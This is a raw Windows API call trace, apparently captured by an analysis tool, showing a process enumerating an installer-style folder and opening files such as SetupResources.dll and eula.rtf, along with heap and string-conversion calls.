0x4e2d0 [0060.869] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0060.869] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0060.869] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0060.869] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0060.869] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0060.869] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0060.869] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de00 [0060.869] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0060.869] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de00 | out: hHeap=0x20000) returned 1 [0060.869] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0060.869] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0060.869] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0060.869] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0060.869] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0060.869] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0060.869] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0060.869] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0060.870] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0060.870] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0060.870] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0060.870] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0060.870] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0060.870] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0060.870] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0060.870] AreFileApisANSI () returned 1 [0060.870] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0060.870] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71a30 [0060.870] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x71a30, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1037\\SetupResources.dll") returned 46 [0060.870] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\1037\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1037\\setupresources.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4158)) returned 1 [0060.870] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0060.870] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0060.870] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0060.870] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0060.870] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.870] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.870] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x5a, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x463d0, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x5a, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="ce", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓䅘")) returned 0 [0060.870] FindClose (in: hFindFile=0x78f10 | out: hFindFile=0x78f10) returned 1 [0060.870] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d040 [0060.870] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0060.870] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d040 | out: hHeap=0x20000) returned 1 [0060.870] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0060.870] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0060.870] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0060.870] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0060.870] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0060.870] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0060.870] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x469e8 | out: hHeap=0x20000) returned 1 [0060.870] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0060.870] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0060.871] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0060.871] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0060.871] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0060.871] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0060.871] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0060.871] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0060.871] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1f0 [0060.871] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x693f0 [0060.871] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1f0 | out: hHeap=0x20000) returned 1 [0060.871] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0060.871] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x693f0 | out: hHeap=0x20000) returned 1 [0060.871] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.871] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.871] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.871] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.871] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0060.871] AreFileApisANSI () returned 1 [0060.871] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1038", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1038", lpUsedDefaultChar=0x0) returned 27 [0060.871] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0060.871] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.871] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.871] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0060.871] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0060.871] AreFileApisANSI () returned 1 [0060.871] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88720, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 27 [0060.871] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x36) returned 0x78f10 [0060.871] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88720, cbMultiByte=-1, lpWideCharStr=0x78f10, cchWideChar=27 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1038") returned 27 [0060.871] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1038" (normalized: "c:\\588bce7c90097ed212\\1038"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0060.872] GetLastError () returned 0x5 [0060.872] GetLastError () returned 0x5 [0060.872] SetLastError (dwErrCode=0x5) [0060.872] GetLastError () returned 0x5 [0060.872] SetLastError (dwErrCode=0x5) [0060.872] GetLastError () returned 0x5 [0060.872] SetLastError (dwErrCode=0x5) [0060.872] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x78f10 | out: hHeap=0x20000) returned 1 [0060.872] AreFileApisANSI () returned 1 [0060.872] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88720, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 27 [0060.872] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x36) returned 0x78f10 [0060.872] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88720, cbMultiByte=-1, lpWideCharStr=0x78f10, cchWideChar=27 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1038") returned 27 [0060.872] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1038" (normalized: "c:\\588bce7c90097ed212\\1038"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0060.872] GetLastError () returned 0x5 [0060.872] GetLastError () returned 0x5 [0060.872] SetLastError (dwErrCode=0x5) [0060.872] GetLastError () returned 0x5 [0060.872] SetLastError (dwErrCode=0x5) [0060.872] GetLastError () returned 0x5 [0060.872] SetLastError (dwErrCode=0x5) [0060.872] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x78f10 | out: hHeap=0x20000) returned 1 [0060.872] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0060.872] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0060.872] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0060.872] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.873] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.873] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.873] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.873] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0060.873] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68f40 [0060.873] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0060.873] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0060.873] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68f40 | out: hHeap=0x20000) returned 1 [0060.873] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="1040", cAlternateFileName="")) returned 1 [0060.873] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0060.873] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0060.873] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0060.873] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0060.873] FindFirstFileExW (in: lpFileName="C:\\588bce7c90097ed212\\1038\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x78f10 [0060.873] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.873] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0x109e, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0060.873] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0060.873] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0060.873] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0060.873] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0060.873] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0060.873] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0060.873] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0060.873] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0060.873] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0060.873] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0060.873] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0060.873] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46828 [0060.873] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0060.874] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0060.874] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0060.874] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0060.874] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0060.874] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf00 [0060.874] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0060.874] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0060.874] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0060.874] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0060.874] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0060.874] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0060.874] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5e) returned 0x71620 [0060.874] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0060.874] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0060.874] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d1b8 [0060.874] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0060.874] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.874] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.874] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.874] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.874] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d1b8 | out: hHeap=0x20000) returned 1 [0060.874] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0060.874] AreFileApisANSI () returned 1 [0060.874] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1038\\eula.rtf", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1038\\eula.rtf", lpUsedDefaultChar=0x0) returned 36 [0060.874] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0060.874] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.874] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.874] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d040 [0060.874] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0060.874] AreFileApisANSI () returned 1 [0060.874] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e378, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0060.874] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x694e0 [0060.874] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e378, cbMultiByte=-1, lpWideCharStr=0x694e0, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1038\\eula.rtf") returned 36 [0060.875] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1038\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1038\\eula.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0060.875] GetFileType (hFile=0x41c) returned 0x1 [0060.875] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x694e0 | out: hHeap=0x20000) returned 1 [0060.875] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0060.875] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0060.875] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0060.875] CloseHandle (hObject=0x41c) returned 1 [0060.875] AreFileApisANSI () returned 1 [0060.875] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e378, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0060.876] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x68d60 [0060.876] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e378, cbMultiByte=-1, lpWideCharStr=0x68d60, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1038\\eula.rtf") returned 36 [0060.876] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1038\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1038\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0060.876] GetFileType (hFile=0x41c) returned 0x1 [0060.876] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0060.876] CloseHandle (hObject=0x41c) returned 1 [0060.876] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0060.876] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0060.876] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0060.876] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0060.876] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0060.876] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0060.876] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0060.876] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0060.876] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0060.876] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0060.876] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0060.876] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0060.876] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0060.876] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0060.876] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0060.876] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0060.876] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0060.876] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0060.876] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0060.876] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0060.877] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0060.877] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0060.877] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0060.877] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0060.877] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0060.877] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0060.877] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0060.877] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0060.877] AreFileApisANSI () returned 1 [0060.877] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e378, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0060.877] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x68f40 